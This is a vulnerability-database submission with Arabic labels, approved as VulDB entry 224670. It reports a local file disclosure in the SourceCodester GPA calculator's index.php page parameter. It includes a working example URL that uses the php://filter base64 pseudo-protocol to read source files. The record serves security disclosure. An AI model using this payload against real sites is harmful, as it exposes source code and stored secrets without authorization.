| عنوان | The page parameter in index.php in php-sqlite-gpa-calculator exists to read the file |
|---|
| الوصف | A serious vulnerability was found in php-sqlite-gpa-calculator, which allows users to read file content through php pseudo-protocol after concatenating urls。
http://127.0.0.1/php-sqlite-gpa-calculator/?page=grade_table can be concatenated and written as http://127.0.0.1/php-sqlite-gpa-calculator/?page=php://filter/read=convert.base64-encode/resource=grade_table
project url :https://www.sourcecodester.com/php/16373/grade-point-average-gpa-calculator-php-and-sqlite3-source-code-free-download.html |
|---|
| المصدر | ⚠️ https://github.com/Pe4cefulSnow/CVE-Advisory/blob/main/README.md |
|---|
| المستخدم | Pe4cefulSnow (UID 34389) |
|---|
| ارسال | 31/03/2023 06:43 AM (3 سنوات منذ) |
|---|
| الاعتدال | 31/03/2023 12:30 PM (6 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 224670 [SourceCodester Grade Point Average GPA Calculator 1.0 index.php page الكشف عن المعلومات] |
|---|
| النقاط | 20 |
|---|